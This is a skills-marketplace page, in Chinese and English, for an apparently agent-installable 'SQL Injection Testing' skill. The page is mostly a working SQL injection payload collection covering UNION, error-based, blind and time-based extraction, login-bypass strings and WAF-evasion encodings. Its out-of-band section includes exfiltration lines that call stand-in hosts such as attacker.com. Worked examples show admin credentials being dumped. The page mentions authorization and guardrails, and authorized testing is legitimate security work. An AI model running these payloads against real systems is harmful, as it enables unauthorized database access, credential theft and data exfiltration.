SQL注入测试指南：全面漏洞评估与安全防护方案

SQL Injection Testing by davila7/claude-code-templates

22,600 GitHub Stars

GitHub

安装命令

npx skills add https://github.com/davila7/claude-code-templates --skill 'SQL Injection Testing'

Web应用测试安全

🇨🇳中文介绍

SQL 注入测试

目的

对 Web 应用程序执行全面的 SQL 注入漏洞评估，以识别数据库安全缺陷、演示利用技术并验证输入净化机制。此技能能够系统性地检测和利用跨带内、盲注和带外攻击向量的 SQL 注入漏洞，以评估应用程序的安全状况。

输入 / 先决条件

所需访问权限

具有可注入参数的目标 Web 应用程序 URL
Burp Suite 或等效的代理工具用于请求操纵
用于自动化利用的 SQLMap 安装
启用了开发者工具的浏览器

技术要求

理解 SQL 查询语法（MySQL、MSSQL、PostgreSQL、Oracle）
了解 HTTP 请求/响应周期
熟悉数据库模式和结构
测试报告的写入权限

法律先决条件

渗透测试的书面授权
定义的范围，包括目标 URL 和参数
已建立的紧急联系程序
已就位的数据处理协议

输出 / 交付成果

主要输出

带有严重性评级的 SQL 注入漏洞报告
提取的数据库模式和表结构
身份验证绕过概念验证演示
包含代码示例的修复建议

证据工件

成功注入的截图
HTTP 请求/响应日志
数据库转储（已清理）
有效负载文档

核心工作流程

阶段 1：检测与侦察

识别可注入参数

定位与数据库查询交互的用户可控输入字段：

# 常见注入点
- URL 参数：?id=1, ?user=admin, ?category=books
- 表单字段：username, password, search, comments
- Cookie 值：session_id, user_preference
- HTTP 头部：User-Agent, Referer, X-Forwarded-For

广告位招租

在这里展示您的产品或服务

触达数万 AI 开发者，精准高效

联系我们

阶段 2：利用技术

基于 UNION 的提取

将攻击者控制的 SELECT 语句与原始查询结合：

-- 确定列数
ORDER BY 1--
ORDER BY 2--
ORDER BY 3--
-- 继续直到出现错误

-- 查找可显示的列
UNION SELECT NULL,NULL,NULL--
UNION SELECT 'a',NULL,NULL--
UNION SELECT NULL,'a',NULL--

-- 提取数据
UNION SELECT username,password,NULL FROM users--
UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--

基于错误的提取

强制数据库错误以泄露信息：

-- MSSQL 版本提取
1' AND 1=CONVERT(int,(SELECT @@version))--

-- 通过 XPATH 进行 MySQL 提取
1' AND extractvalue(1,concat(0x7e,(SELECT @@version)))--

-- PostgreSQL 转换错误
1' AND 1=CAST((SELECT version()) AS int)--

盲注布尔型提取

通过应用程序行为变化推断数据：

-- 字符提取
1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'--
1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='b'--

-- 条件响应
1' AND (SELECT COUNT(*) FROM users WHERE username='admin')>0--

基于时间的盲注提取

使用数据库休眠函数进行确认：

-- MySQL
1' AND IF(1=1,SLEEP(5),0)--
1' AND IF((SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a',SLEEP(5),0)--

-- MSSQL
1'; WAITFOR DELAY '0:0:5'--

-- PostgreSQL
1'; SELECT pg_sleep(5)--

带外（OOB）提取

通过外部通道泄露数据：

-- MSSQL DNS 泄露
1; EXEC master..xp_dirtree '\\attacker-server.com\share'--

-- MySQL DNS 泄露
1' UNION SELECT LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\a'))--

-- Oracle HTTP 请求
1' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual--

阶段 3：身份验证绕过

制作有效负载以绕过凭据验证：

-- 经典绕过
admin'--
admin'/*
' OR '1'='1
' OR '1'='1'--
' OR '1'='1'/*
') OR ('1'='1
') OR ('1'='1'--

-- 用户名枚举
admin' AND '1'='1
admin' AND '1'='2

查询转换示例：

-- 原始查询
SELECT * FROM users WHERE username='input' AND password='input'

-- 注入后（用户名：admin'--）
SELECT * FROM users WHERE username='admin'--' AND password='anything'
-- 通过注释绕过密码检查

阶段 4：过滤器绕过技术

当特殊字符被阻止时：

-- URL 编码
%27 (单引号)
%22 (双引号)
%23 (井号)

-- 双重 URL 编码
%2527 (单引号)

-- Unicode 替代方案
U+0027 (撇号)
U+02B9 (修饰字母撇号)

-- 十六进制字符串（MySQL）
SELECT * FROM users WHERE name=0x61646D696E  -- 'admin' 的十六进制形式

替换被阻止的空格：

-- 注释替换
SELECT/**/username/**/FROM/**/users
SEL/**/ECT/**/username/**/FR/**/OM/**/users

-- 替代空格
SELECT%09username%09FROM%09users  -- 制表符
SELECT%0Ausername%0AFROM%0Ausers  -- 换行符

规避列入黑名单的 SQL 关键字：

-- 大小写变化
SeLeCt, sElEcT, SELECT

-- 内联注释
SEL/*bypass*/ECT
UN/*bypass*/ION

-- 双重写入（如果过滤器只移除一次）
SELSELECTECT → SELECT
UNUNIONION → UNION

-- 空字节注入
%00SELECT
SEL%00ECT

1. 插入 ' → 检查错误
2. 插入 " → 检查错误
3. 尝试：OR 1=1-- → 检查行为变化
4. 尝试：AND 1=2-- → 检查行为变化
5. 尝试：' WAITFOR DELAY '0:0:5'-- → 检查延迟

数据库指纹识别

-- MySQL
SELECT @@version
SELECT version()

-- MSSQL
SELECT @@version
SELECT @@servername

-- PostgreSQL
SELECT version()

-- Oracle
SELECT banner FROM v$version
SELECT * FROM v$version

-- MySQL/MSSQL 表枚举
SELECT table_name FROM information_schema.tables WHERE table_schema=database()

-- 列枚举
SELECT column_name FROM information_schema.columns WHERE table_name='users'

-- Oracle 等效查询
SELECT table_name FROM all_tables
SELECT column_name FROM all_tab_columns WHERE table_name='USERS'

常见有效负载快速列表

目的	有效负载
基本测试	`'` 或 `"`
布尔真	`OR 1=1--`
布尔假	`AND 1=2--`
注释（MySQL）	`#` 或 `--`
注释（MSSQL）	`--`
UNION 探测	`UNION SELECT NULL--`
时间延迟	`AND SLEEP(5)--`
身份验证绕过	`' OR '1'='1`

约束与防护措施

未经明确授权，切勿执行破坏性查询（DROP、DELETE、TRUNCATE）
将数据提取限制在概念验证所需的数量
避免通过资源密集型查询导致拒绝服务
一旦检测到包含真实用户数据的生产数据库，立即停止

WAF/IPS 可能会阻止常见有效负载，需要规避技术
参数化查询可防止标准注入
某些盲注需要大量请求（存在速率限制问题）
二阶注入需要理解数据流

法律和道德要求

测试前必须存在书面范围协议
记录所有提取的数据，并按照数据保护要求处理
立即通过约定的渠道报告关键漏洞
切勿访问超出范围要求的数据

示例 1：电子商务产品页面 SQL 注入

场景：测试带有 ID 参数的产品展示页面

GET /product.php?id=5 HTTP/1.1

GET /product.php?id=5' HTTP/1.1
Response: MySQL error - syntax error near '''

GET /product.php?id=5 ORDER BY 4-- HTTP/1.1
Response: Normal
GET /product.php?id=5 ORDER BY 5-- HTTP/1.1
Response: Error (4 columns confirmed)

GET /product.php?id=-5 UNION SELECT 1,username,password,4 FROM admin_users-- HTTP/1.1
Response: Displays admin credentials

示例 2：盲注时间型提取

场景：无可见输出，测试盲注

id=5' AND SLEEP(5)-- 
-- Response delayed by 5 seconds (vulnerable confirmed)

提取数据库名称长度：

id=5' AND IF(LENGTH(database())=8,SLEEP(5),0)--
-- Delay confirms database name is 8 characters

id=5' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--
-- Iterate through characters to extract: 'appstore'

示例 3：登录绕过

目标：管理员登录表单

标准登录查询：

SELECT * FROM users WHERE username='[input]' AND password='[input]'

注入有效负载：

Username: administrator'--
Password: anything

生成的查询：

SELECT * FROM users WHERE username='administrator'--' AND password='anything'

结果：密码检查被绕过，以管理员身份通过身份验证。

未显示错误消息

应用程序使用通用错误处理
切换到盲注技术（布尔型或时间型）
监控响应长度差异而非内容

列数可能不正确 → 使用 ORDER BY 测试
数据类型可能不匹配 → 首先对所有列使用 NULL
结果可能不显示 → 查找可注入的列位置

使用编码技术（URL、十六进制、Unicode）
在关键字中插入内联注释
尝试相同操作的替代语法
将有效负载分散到多个参数中

有效负载未执行

验证数据库类型的正确注释语法
检查应用程序是否使用参数化查询
确认输入到达 SQL 查询（未在客户端过滤）
测试不同的注入点（头部、Cookie）

时间型注入不一致

网络延迟可能导致误报
使用更长的延迟（10 秒以上）以提高清晰度
运行多次测试以确认模式
考虑服务器端缓存效应

🇺🇸English

SQL Injection Testing

Purpose

Execute comprehensive SQL injection vulnerability assessments on web applications to identify database security flaws, demonstrate exploitation techniques, and validate input sanitization mechanisms. This skill enables systematic detection and exploitation of SQL injection vulnerabilities across in-band, blind, and out-of-band attack vectors to assess application security posture.

Inputs / Prerequisites

Required Access

Target web application URL with injectable parameters
Burp Suite or equivalent proxy tool for request manipulation
SQLMap installation for automated exploitation
Browser with developer tools enabled

Technical Requirements

Understanding of SQL query syntax (MySQL, MSSQL, PostgreSQL, Oracle)
Knowledge of HTTP request/response cycle
Familiarity with database schemas and structures
Write permissions for testing reports

Legal Prerequisites

Written authorization for penetration testing
Defined scope including target URLs and parameters
Emergency contact procedures established
Data handling agreements in place

Outputs / Deliverables

Primary Outputs

SQL injection vulnerability report with severity ratings
Extracted database schemas and table structures
Authentication bypass proof-of-concept demonstrations
Remediation recommendations with code examples

Evidence Artifacts

Screenshots of successful injections
HTTP request/response logs
Database dumps (sanitized)
Payload documentation

Core Workflow

Phase 1: Detection and Reconnaissance

Identify Injectable Parameters

Locate user-controlled input fields that interact with database queries:

# Common injection points
- URL parameters: ?id=1, ?user=admin, ?category=books
- Form fields: username, password, search, comments
- Cookie values: session_id, user_preference
- HTTP headers: User-Agent, Referer, X-Forwarded-For

Test for Basic Vulnerability Indicators

Insert special characters to trigger error responses:

-- Single quote test
'

-- Double quote test
"

-- Comment sequences
--
#
/**/

-- Semicolon for query stacking
;

-- Parentheses
)

Monitor application responses for:

Database error messages revealing query structure
Unexpected application behavior changes
HTTP 500 Internal Server errors
Modified response content or length

Logic Testing Payloads

Verify boolean-based vulnerability presence:

-- True condition tests
page.asp?id=1 or 1=1
page.asp?id=1' or 1=1--
page.asp?id=1" or 1=1--

-- False condition tests  
page.asp?id=1 and 1=2
page.asp?id=1' and 1=2--

Compare responses between true and false conditions to confirm injection capability.

Phase 2: Exploitation Techniques

UNION-Based Extraction

Combine attacker-controlled SELECT statements with original query:

-- Determine column count
ORDER BY 1--
ORDER BY 2--
ORDER BY 3--
-- Continue until error occurs

-- Find displayable columns
UNION SELECT NULL,NULL,NULL--
UNION SELECT 'a',NULL,NULL--
UNION SELECT NULL,'a',NULL--

-- Extract data
UNION SELECT username,password,NULL FROM users--
UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--

Error-Based Extraction

Force database errors that leak information:

-- MSSQL version extraction
1' AND 1=CONVERT(int,(SELECT @@version))--

-- MySQL extraction via XPATH
1' AND extractvalue(1,concat(0x7e,(SELECT @@version)))--

-- PostgreSQL cast errors
1' AND 1=CAST((SELECT version()) AS int)--

Blind Boolean-Based Extraction

Infer data through application behavior changes:

-- Character extraction
1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'--
1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='b'--

-- Conditional responses
1' AND (SELECT COUNT(*) FROM users WHERE username='admin')>0--

Time-Based Blind Extraction

Use database sleep functions for confirmation:

-- MySQL
1' AND IF(1=1,SLEEP(5),0)--
1' AND IF((SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a',SLEEP(5),0)--

-- MSSQL
1'; WAITFOR DELAY '0:0:5'--

-- PostgreSQL
1'; SELECT pg_sleep(5)--

Out-of-Band (OOB) Extraction

Exfiltrate data through external channels:

-- MSSQL DNS exfiltration
1; EXEC master..xp_dirtree '\\attacker-server.com\share'--

-- MySQL DNS exfiltration
1' UNION SELECT LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\a'))--

-- Oracle HTTP request
1' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual--

Phase 3: Authentication Bypass

Login Form Exploitation

Craft payloads to bypass credential verification:

-- Classic bypass
admin'--
admin'/*
' OR '1'='1
' OR '1'='1'--
' OR '1'='1'/*
') OR ('1'='1
') OR ('1'='1'--

-- Username enumeration
admin' AND '1'='1
admin' AND '1'='2

Query transformation example:

-- Original query
SELECT * FROM users WHERE username='input' AND password='input'

-- Injected (username: admin'--)
SELECT * FROM users WHERE username='admin'--' AND password='anything'
-- Password check bypassed via comment

Phase 4: Filter Bypass Techniques

Character Encoding Bypass

When special characters are blocked:

-- URL encoding
%27 (single quote)
%22 (double quote)
%23 (hash)

-- Double URL encoding
%2527 (single quote)

-- Unicode alternatives
U+0027 (apostrophe)
U+02B9 (modifier letter prime)

-- Hexadecimal strings (MySQL)
SELECT * FROM users WHERE name=0x61646D696E  -- 'admin' in hex

Whitespace Bypass

Substitute blocked spaces:

-- Comment substitution
SELECT/**/username/**/FROM/**/users
SEL/**/ECT/**/username/**/FR/**/OM/**/users

-- Alternative whitespace
SELECT%09username%09FROM%09users  -- Tab character
SELECT%0Ausername%0AFROM%0Ausers  -- Newline

Keyword Bypass

Evade blacklisted SQL keywords:

-- Case variation
SeLeCt, sElEcT, SELECT

-- Inline comments
SEL/*bypass*/ECT
UN/*bypass*/ION

-- Double writing (if filter removes once)
SELSELECTECT → SELECT
UNUNIONION → UNION

-- Null byte injection
%00SELECT
SEL%00ECT

Quick Reference

Detection Test Sequence

1. Insert ' → Check for error
2. Insert " → Check for error
3. Try: OR 1=1-- → Check for behavior change
4. Try: AND 1=2-- → Check for behavior change
5. Try: ' WAITFOR DELAY '0:0:5'-- → Check for delay

Database Fingerprinting

-- MySQL
SELECT @@version
SELECT version()

-- MSSQL
SELECT @@version
SELECT @@servername

-- PostgreSQL
SELECT version()

-- Oracle
SELECT banner FROM v$version
SELECT * FROM v$version

Information Schema Queries

-- MySQL/MSSQL table enumeration
SELECT table_name FROM information_schema.tables WHERE table_schema=database()

-- Column enumeration
SELECT column_name FROM information_schema.columns WHERE table_name='users'

-- Oracle equivalent
SELECT table_name FROM all_tables
SELECT column_name FROM all_tab_columns WHERE table_name='USERS'

Common Payloads Quick List

Purpose	Payload
Basic test	`'` or `"`
Boolean true	`OR 1=1--`
Boolean false	`AND 1=2--`
Comment (MySQL)	`#` or `--`
Comment (MSSQL)	`--`
UNION probe

Constraints and Guardrails

Operational Boundaries

Never execute destructive queries (DROP, DELETE, TRUNCATE) without explicit authorization
Limit data extraction to proof-of-concept quantities
Avoid denial-of-service through resource-intensive queries
Stop immediately upon detecting production database with real user data

Technical Limitations

WAF/IPS may block common payloads requiring evasion techniques
Parameterized queries prevent standard injection
Some blind injection requires extensive requests (rate limiting concerns)
Second-order injection requires understanding of data flow

Legal and Ethical Requirements

Written scope agreement must exist before testing
Document all extracted data and handle per data protection requirements
Report critical vulnerabilities immediately through agreed channels
Never access data beyond scope requirements

Examples

Example 1: E-commerce Product Page SQLi

Scenario : Testing product display page with ID parameter

Initial Request :

GET /product.php?id=5 HTTP/1.1

Detection Test :

GET /product.php?id=5' HTTP/1.1
Response: MySQL error - syntax error near '''

Column Enumeration :

GET /product.php?id=5 ORDER BY 4-- HTTP/1.1
Response: Normal
GET /product.php?id=5 ORDER BY 5-- HTTP/1.1
Response: Error (4 columns confirmed)

Data Extraction :

GET /product.php?id=-5 UNION SELECT 1,username,password,4 FROM admin_users-- HTTP/1.1
Response: Displays admin credentials

Example 2: Blind Time-Based Extraction

Scenario : No visible output, testing for blind injection

Confirm Vulnerability :

id=5' AND SLEEP(5)-- 
-- Response delayed by 5 seconds (vulnerable confirmed)

Extract Database Name Length :

id=5' AND IF(LENGTH(database())=8,SLEEP(5),0)--
-- Delay confirms database name is 8 characters

Extract Characters :

id=5' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--
-- Iterate through characters to extract: 'appstore'

Example 3: Login Bypass

Target : Admin login form

Standard Login Query :

SELECT * FROM users WHERE username='[input]' AND password='[input]'

Injection Payload :

Username: administrator'--
Password: anything

Resulting Query :

SELECT * FROM users WHERE username='administrator'--' AND password='anything'

Result : Password check bypassed, authenticated as administrator.

Troubleshooting

No Error Messages Displayed

Application uses generic error handling
Switch to blind injection techniques (boolean or time-based)
Monitor response length differences instead of content

UNION Injection Fails

Column count may be incorrect → Test with ORDER BY
Data types may mismatch → Use NULL for all columns first
Results may not display → Find injectable column positions

WAF Blocking Requests

Use encoding techniques (URL, hex, unicode)
Insert inline comments within keywords
Try alternative syntax for same operations
Fragment payload across multiple parameters

Payload Not Executing

Verify correct comment syntax for database type
Check if application uses parameterized queries
Confirm input reaches SQL query (not filtered client-side)
Test different injection points (headers, cookies)

Time-Based Injection Inconsistent

Network latency may cause false positives
Use longer delays (10+ seconds) for clarity
Run multiple tests to confirm pattern
Consider server-side caching effects

Weekly Installs

Repository

davila7/claude-…emplates

GitHub Stars

22.6K

First Seen

Jan 1, 1970

Security Audits

Gen Agent Trust HubPass SocketPass SnykFail

xdrop 文件传输脚本：Bun 环境下安全上传下载工具，支持加密分享

24,700 周安装